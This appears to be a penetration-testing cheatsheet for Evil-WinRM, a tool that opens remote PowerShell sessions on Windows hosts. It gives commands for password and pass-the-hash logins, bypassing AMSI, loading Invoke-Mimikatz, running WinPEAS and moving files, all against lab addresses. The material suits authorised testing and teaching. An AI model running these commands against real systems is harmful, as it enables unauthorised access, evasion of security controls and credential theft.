Evil-WinRM Cheatsheet

Evil-WinRM, created by the Hackplayers team, is a penetration testing utility aimed at streamlining engagement in Windows-based environments. Built on the PowerShell Remoting Protocol (PSRP), Evil-WinRM leverages Windows Remote Management (WinRM), a SOAP-based service that communicates over HTTP (default port 5985). This makes it firewall-friendly and ideal for post-exploitation.

For further details on PowerShell Remoting, check Microsoft’s official guide:

Enable-PSRemoting Documentation

Table of Contents

  • Introduction
  • Checking for WinRM
  • Help Menu and Features
  • Login with Password
  • Secure Login via SSL
  • Login via NTLM Hash
  • Execute PowerShell Scripts
  • Logging Sessions
  • Disable Remote Path Completion
  • Disable Color Output
  • Run Executables
  • Enumerating Services
  • File Transfers
  • Using Evil-WinRM in Docker
  • Login Using Keys
  • Final Thoughts

Introduction

Written in Ruby, Evil-WinRM simplifies post-exploitation for security professionals. From plain-text logins to NTLM hash authentication, script execution, and more — it’s a feature-rich solution found in most modern Kali Linux distributions. You can also download it from GitHub:

Evil-WinRM GitHub Repository

Checking for WinRM

Before using Evil-WinRM, ensure the target host has WinRM enabled. Run an Nmap scan for ports 5985 and 5986:

nmap -p 5985,5986 192.168.1.19

Help Menu and Features

To explore all available options, run the help command:

evil-winrm -h

Login with Password

If you’ve retrieved valid credentials, use them to open a remote PowerShell session:

evil-winrm -i 192.168.1.19 -u administrator -p Ignite@987

Secure Login via SSL

For encrypted sessions, include the -S flag to initiate SSL:

evil-winrm -i 192.168.1.19 -u administrator -p Ignite@987 -S

Login via NTLM Hash

To authenticate using an NTLM hash, use the -H flag:

evil-winrm -i 192.168.1.19 -u administrator -H 32196B56FFE6F45E294117B91A83BF38

More details here: Pass-the-Hash Guide

Execute PowerShell Scripts

Use local scripts with -s. You can also bypass AMSI before running payloads:


evil-winrm -i 192.168.1.19 -u administrator -p Ignite@987 -s /opt/privsc/powershell
Bypass-4MSI
Invoke-Mimikatz.ps1
Invoke-Mimikatz

Script Source: Invoke-Mimikatz

Logging Sessions

Use -l to store session logs locally for documentation or analysis:

evil-winrm -i 192.168.1.19 -u administrator -p Ignite@987 -l

Disable Remote Path Completion

Prefer manual input? Disable auto-completion with -N:

evil-winrm -i 192.168.1.19 -u administrator -p Ignite@987 -N

Disable Color Output

To disable colored CLI output, use the -n option:

evil-winrm -i 192.168.1.19 -u administrator -p Ignite@987 -n

Run Executables

Need to execute binaries like WinPEAS? Use the -e option and the Invoke-Binary feature:


evil-winrm -i 192.168.1.19 -u administrator -p Ignite@987 -e /opt/privsc
Bypass-4MSI
menu
Invoke-Binary /opt/privsc/winPEASx64.exe

Enumerating Services

Use the built-in menu to discover running services on the compromised host — useful when other tools fall short:

menu → services

File Transfers

Upload files to the target system:

upload /root/notes.txt .

Download files back to your machine:

download notes.txt /root/ddrt/notes.txt

Using Evil-WinRM in Docker

Don’t want to install it locally? Run from Docker with:

docker run --rm -ti --name evil-winrm oscarakaelvis/evil-winrm -i 192.168.1.105 -u Administrator -p 'Ignite@987'

Login Using Keys

Connect using a certificate and private key pair. Optionally, use SSL for encryption:

evil-winrm -i 10.129.227.105 -c certificate.pem -k priv-key.pem -S

Final Thoughts

This guide outlined Evil-WinRM’s core functionality and hidden gems that simplify internal assessments and CTFs. From basic login to script execution and binary injection, Evil-WinRM remains a powerful tool in any pentester’s arsenal. A big thank you to the Hackplayers crew for creating it. Happy hacking!

 

Find this helpful? Share it with others!
Leave a Reply

Filed under: Ethical Hacking - @ June 14, 2025 9:49 pm